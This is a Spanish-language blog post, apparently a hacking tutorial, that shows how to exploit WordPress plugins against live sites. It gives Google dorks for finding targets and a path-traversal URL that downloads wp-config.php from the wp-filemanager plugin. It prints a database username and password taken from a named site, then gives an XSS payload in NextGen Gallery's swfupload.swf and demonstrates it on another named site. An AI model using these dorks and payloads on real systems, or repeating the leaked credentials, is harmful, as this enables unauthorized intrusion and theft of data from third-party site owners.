Saludos nuevamente mis queridos y fieles lectores de este humilde blog, en esta oportunidad tocaremos el tema sobre la explotación de un "cms" como Wordpress, mediante los exploit's de url en los sectores vulnerables o débiles de privilegios
Exploit
Local File Download Wordpresss
La vulnerabilidad archivo de descarga de servidor local, nos permite descargas contenido de información de base de datos las cuales el atacante puede aprovechar para la penetración el servidor web de una manera fácil y rápida
Dork
inurl:/wp-content/plugins/wp-filemanager/ site:.com
Exploit :
/incl/libfile.php?&path=../../&filename=wp-config.php&action=download
Ejemplo de ataque :
Link de la web la cual ingresaste el dork " http://www.wildrift.com/wp-content/plugins/wp-filemanager/" , luego de ello introducirás lo siguiente " /incl/libfile.php?&path=../../&filename=wp-config.php&action=download "
Como vemos en la imagen, podemos ver que al introducir el exploit , automáticamente nos descarga el archivo config.php, bien lo guardaremos
Archivo "config.php"
INFORMACIÓN DE BD
('DB_USER', 'wildri8u_advent');
/** MySQL database password */
define('DB_PASSWORD', 'xa.+(&]AUyrR');
/** MySQL hostname */
define('DB_HOST', 'localhost');
Exploit
Cross Site Scripting
Como todos sabemos lo que es un error " Cross Site Scripting " , no es necesario que lo diga en este párrafo, pero dejare la referencia de ello en este link :
http://backtrack-omar.blogspot.com/2013/02/cross-site-scripting-xss.html
Bueno prosigamos, en el modulo de plugins "Plugin NextGen," , se ah descubierto que este complemento tiene un grave error de "XSS", la cual puede ser aprovechado para varios tipos de ataques dirigidos de cualquier persona que tenga conocimientos de cada uno de ellos.
Dork :
inurl:/wp-content/plugins/wp-filemanager/ site:.com
Exploit :
/wp-content/plugins/nextgen-gallery/admin/js/swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert('backtrack-omar.blogspot.com');//
Ejemplo :
drfranklipman.com/wp-content/plugins/nextgen-gallery/admin/js/swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert('backtrack-omar.blogspot.com');//
Saludos!!
0 comentarios:
Publicar un comentario